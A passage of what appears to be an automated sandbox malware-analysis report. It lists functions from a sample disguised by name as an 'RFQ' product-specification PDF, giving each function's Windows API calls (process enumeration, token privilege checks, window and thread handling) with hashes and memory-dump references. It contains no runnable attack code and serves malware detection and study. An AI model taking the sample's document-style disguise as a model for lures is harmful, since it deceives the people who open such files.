                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                • Opcode ID: bffac7b6bd1eb1433b5f428173998f45cd3860aeedd6e9853cacddef74e6b282
                                                                                                                • Instruction ID: f36da383d933415d8082ccefd0c3d038f531a196f917bb43b72ecaa8c637cff8
                                                                                                                • Opcode Fuzzy Hash: bffac7b6bd1eb1433b5f428173998f45cd3860aeedd6e9853cacddef74e6b282
                                                                                                                • Instruction Fuzzy Hash: 87419C34A09215DFCB05CF98C894EAD77F4BB48350F5489AAE5269B361E730E942CB90
                                                                                                                Function 00AD16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00AD16EB
                                                                                                                  • Part of subcall function 00AA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA3A57
                                                                                                                  • Part of subcall function 00AA3A3D: GetCurrentThreadId.KERNEL32 ref: 00AA3A5E
                                                                                                                  • Part of subcall function 00AA3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AA25B3), ref: 00AA3A65
                                                                                                                • GetCaretPos.USER32(?), ref: 00AD16FF
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00AD174C
                                                                                                                • GetForegroundWindow.USER32 ref: 00AD1752
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2759813231-0
                                                                                                                • Opcode ID: f7461b5071c93ff6d87479e568ae594089613cbb1c1d00628d792472f5ac5e3c
                                                                                                                • Instruction ID: 5c87a1cafe09a7932c8db4d6a34f55bae9fec1d082efbda6833eac7710e31372
                                                                                                                • Opcode Fuzzy Hash: f7461b5071c93ff6d87479e568ae594089613cbb1c1d00628d792472f5ac5e3c
                                                                                                                • Instruction Fuzzy Hash: BA314175D01249AFCB00DFA9C981CAEB7F9EF89314B5080AAE416E7211D735DE45CFA0
                                                                                                                Function 00AAD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00AAD501
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00AAD50F
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00AAD52F
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AAD5DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 420147892-0
                                                                                                                • Opcode ID: 8da44203f4140eee18c5ee25fd6c164bcd2cd6d80f5810c7b9e2292a62291126
                                                                                                                • Instruction ID: a4b7d23e6156ea722fb7a289135d74def60d3cd2880f2a57e0cbc2a6051a15ae
                                                                                                                • Opcode Fuzzy Hash: 8da44203f4140eee18c5ee25fd6c164bcd2cd6d80f5810c7b9e2292a62291126
                                                                                                                • Instruction Fuzzy Hash: 75319E321083019FD301EF54C885AAFBBE8AFDA354F50092DF586871A2EB719949CB92
                                                                                                                Function 00AD8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD9001
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A97711,?,?,?,?,?), ref: 00AD9016
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD905E
                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A97711,?,?,?), ref: 00AD9094
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2864067406-0
                                                                                                                • Opcode ID: 37693c19cac64939ca6e90ed009d1b6d6b5df25dbcb3f5a2b995286c7766fea1
                                                                                                                • Instruction ID: 6d5db6af3fd447686501d2802c14cdb16b93ee57157ba34dc5ad51fbb06bf1db
                                                                                                                • Opcode Fuzzy Hash: 37693c19cac64939ca6e90ed009d1b6d6b5df25dbcb3f5a2b995286c7766fea1
                                                                                                                • Instruction Fuzzy Hash: E221BF35600018EFCB259F98E858EEB3BB9FF49360F448156F9068B261C7319991DB61
                                                                                                                Function 00AAD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?,00ADCB68), ref: 00AAD2FB
                                                                                                                • GetLastError.KERNEL32 ref: 00AAD30A
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AAD319
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ADCB68), ref: 00AAD376
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2267087916-0
                                                                                                                • Opcode ID: f1ba35e03cb7e23d84639728f21272c804c7e93b7b32727c3e5c105e1eeded5e
                                                                                                                • Instruction ID: 97b95ec400ebc94117b89451fbcd34c607971628f6344cd840c555046fa0d1ae
                                                                                                                • Opcode Fuzzy Hash: f1ba35e03cb7e23d84639728f21272c804c7e93b7b32727c3e5c105e1eeded5e
                                                                                                                • Instruction Fuzzy Hash: 0B2182745052019FCB00EF68C9814AFB7E4AE96324F504A1EF4E6DB2E1D731D946CBA3
                                                                                                                Function 00AA1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AA102A
                                                                                                                  • Part of subcall function 00AA1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1036
                                                                                                                  • Part of subcall function 00AA1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1045
                                                                                                                  • Part of subcall function 00AA1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA104C
                                                                                                                  • Part of subcall function 00AA1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1062
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AA15BE
                                                                                                                • _memcmp.LIBVCRUNTIME ref: 00AA15E1
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA1617
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA161E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1592001646-0
                                                                                                                • Opcode ID: 514dfb1cebf6d4ca8677137ede6727340d2fc3fa780cc465b83043c4587af379
                                                                                                                • Instruction ID: 53ace80be2213402c5ef0738d5dc1fed6ee3913aeaa70d191ac145225b476007
                                                                                                                • Opcode Fuzzy Hash: 514dfb1cebf6d4ca8677137ede6727340d2fc3fa780cc465b83043c4587af379
                                                                                                                • Instruction Fuzzy Hash: 69219A31E41109FFDF00DFA4C945BEEB7B8EF45354F084859E442AB281E730AA05CBA0
                                                                                                                Function 00AD2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00AD280A
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AD2824
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AD2832
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AD2840
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                • String ID:
                                                                                                                • API String ID: 2169480361-0
                                                                                                                • Opcode ID: d09f438767c4ac39566bdb7cf66a35c6a14008bc57e733a9a8f3fecc3cb20691
                                                                                                                • Instruction ID: a095dc66f1f0aa4653df41d5a9674740e76e593e39dd61b898ce2eaa3c9c1cf8
                                                                                                                • Opcode Fuzzy Hash: d09f438767c4ac39566bdb7cf66a35c6a14008bc57e733a9a8f3fecc3cb20691
                                                                                                                • Instruction Fuzzy Hash: F421D335205111AFD714DB24C844FAA7BA5EF95324F14825AF4278B7E2C771FC42C790
                                                                                                                Function 00AA78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00AA790A,?,000000FF,?,00AA8754,00000000,?,0000001C,?,?), ref: 00AA8D8C
                                                                                                                  • Part of subcall function 00AA8D7D: lstrcpyW.KERNEL32(00000000,?,?,00AA790A,?,000000FF,?,00AA8754,00000000,?,0000001C,?,?,00000000), ref: 00AA8DB2
                                                                                                                  • Part of subcall function 00AA8D7D: lstrcmpiW.KERNEL32(00000000,?,00AA790A,?,000000FF,?,00AA8754,00000000,?,0000001C,?,?), ref: 00AA8DE3
                                                                                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00AA8754,00000000,?,0000001C,?,?,00000000), ref: 00AA7923
                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00AA8754,00000000,?,0000001C,?,?,00000000), ref: 00AA7949
                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AA8754,00000000,?,0000001C,?,?,00000000), ref: 00AA7984
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                • String ID: cdecl
                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                • Opcode ID: a5561105aa01f5453d6bc65767c4c31d7d0ff01280d47053a15eeacc99a156bd
                                                                                                                • Instruction ID: 9bd154d6149050484207f487e3139a0680e24729398f7672a30c2db1b058b82d
                                                                                                                • Opcode Fuzzy Hash: a5561105aa01f5453d6bc65767c4c31d7d0ff01280d47053a15eeacc99a156bd
                                                                                                                • Instruction Fuzzy Hash: 4E11D33A201202AFDB159F38DC45E7B77A9FF86350B50402BF946CB2A4EB319812C7A1
                                                                                                                Function 00AD7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD7D0B
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00AD7D2A
                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AD7D42
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00ABB7AD,00000000), ref: 00AD7D6B
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID:
                                                                                                                • API String ID: 847901565-0
                                                                                                                • Opcode ID: 20c8d529fc4bdab765e94ddf77ff07d13adcc2f48eb0542b08b08c0f74c51da3
                                                                                                                • Instruction ID: d7ddbf4c015ee537fc3fadd0491c13303c8f9e5f5f79edf3110dd5ae20a2c09a
                                                                                                                • Opcode Fuzzy Hash: 20c8d529fc4bdab765e94ddf77ff07d13adcc2f48eb0542b08b08c0f74c51da3
                                                                                                                • Instruction Fuzzy Hash: 6E11D231205615AFCB148F68CC04AAA3BA6AF45370B518726F937C72F0E7308951CB40
                                                                                                                Function 00AD5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 00AD56BB
                                                                                                                • _wcslen.LIBCMT ref: 00AD56CD
                                                                                                                • _wcslen.LIBCMT ref: 00AD56D8
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AD5816
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 455545452-0
                                                                                                                • Opcode ID: fd252dd26c81a64fc76efd51012de27871af80e47805d6c356ced67c3635c226
                                                                                                                • Instruction ID: ef1d0c4df88041d363023cbd44fe953f3ff9334a3ad3eec769e8e086d6961c5a
                                                                                                                • Opcode Fuzzy Hash: fd252dd26c81a64fc76efd51012de27871af80e47805d6c356ced67c3635c226
                                                                                                                • Instruction Fuzzy Hash: CA11B171E0060896DB20DFB58C85AEE77BCEF11760B50842BF917D6281EB74CA84CF60
                                                                                                                Function 00A71D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 309dfa7998488dcd38e563d33eb6f16d80777e9eed6decb97792b04d7bf8b4b1
                                                                                                                • Instruction ID: 180504ee89a9e241b87a509866f5415a99c6fbf4481c6eb687f02a6c8f0460de
                                                                                                                • Opcode Fuzzy Hash: 309dfa7998488dcd38e563d33eb6f16d80777e9eed6decb97792b04d7bf8b4b1
                                                                                                                • Instruction Fuzzy Hash: 7801A2B22096163EFA2126BC7CC1F6767ACDF817B8F34C326F529A21D3DB608C415560
                                                                                                                Function 00AA1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AA1A47
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AA1A59
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AA1A6F
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AA1A8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 79d28b3a5e473ea4b20bdf8b609b1bc7d767e29392dc6e7034b48d0def0e261b
                                                                                                                • Instruction ID: 07adca38ec81eada1386095c41f10e111cb1e3f29948bba701b453ee0bc28f69
                                                                                                                • Opcode Fuzzy Hash: 79d28b3a5e473ea4b20bdf8b609b1bc7d767e29392dc6e7034b48d0def0e261b
                                                                                                                • Instruction Fuzzy Hash: BB113C3AD01219FFEB10DBA4CD85FADBB78EB04750F200091E600B7290D7716E50DB94
                                                                                                                Function 00AAE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00AAE1FD
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00AAE230
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AAE246
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AAE24D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880819207-0
                                                                                                                • Opcode ID: 2329242233a5e45b60f3e2cf04aa8ab444901501b7b505607c092fa816bb8fe6
                                                                                                                • Instruction ID: f4388f166fe7e57aae6200bb4c04f5466c0f6932239dca79c85c751914e3ec22
                                                                                                                • Opcode Fuzzy Hash: 2329242233a5e45b60f3e2cf04aa8ab444901501b7b505607c092fa816bb8fe6
                                                                                                                • Instruction Fuzzy Hash: 3311C876904259BBCB11DFECAC09BDE7FACEB46320F448656F925D32D5D770890487A0
                                                                                                                Function 00A6D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,?,00A6CFF9,00000000,00000004,00000000), ref: 00A6D218
                                                                                                                • GetLastError.KERNEL32 ref: 00A6D224
                                                                                                                • __dosmaperr.LIBCMT ref: 00A6D22B
